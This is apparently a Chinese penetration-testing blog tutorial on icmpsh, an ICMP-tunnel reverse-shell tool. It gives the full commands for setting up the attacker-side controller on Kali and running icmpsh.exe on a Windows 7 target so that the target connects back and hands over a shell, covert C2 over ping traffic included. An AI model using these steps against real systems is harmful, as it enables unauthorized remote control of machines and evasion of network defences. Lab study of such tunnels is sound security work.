【渗透测试】ICMP隧道技术之icmpsh使用

【渗透测试】ICMP隧道技术之icmpsh使用

一、使用场景

icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方

二、icmpsh

icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。
这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。
icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。

三、环境

kali:10.43.32.28/24

win7:10.43.32.30/24
同一个网段

1、下载工具:(git或者zip)

git clone https://github.com/inquisb/icmpsh.git

在这里插入图片描述

2、安装需要的python库文件

pip2 install impacket 

在这里插入图片描述

3、关闭本机的icmp应答,防止内核对自己的ping包响应

sysctl -w net.ipv4.icmp_echo_ignore_all=1

后面实验结束之后在自行调整过来即可

sysctl -w net.ipv4.icmp_echo_ignore_all=0

在这里插入图片描述

python2 icmpsh_m.py 10.43.32.28  10.43.32.30 
[攻击机ip][目标机ip]

4、目标机执行命令(这里需要各种手段把icmpsh.exe放到目标机上)

icmpsh.exe -t 10.43.32.28
[攻击机ip]

在这里插入图片描述

攻击机上成功反弹shell

在这里插入图片描述

参考:
https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.

https://blog.csdn.net/Zlirving_/article/details/113780982?utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_title~default-0.no_search_link&spm=1001.2101.3001.4242.


版权声明:本文为weixin_42742658原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。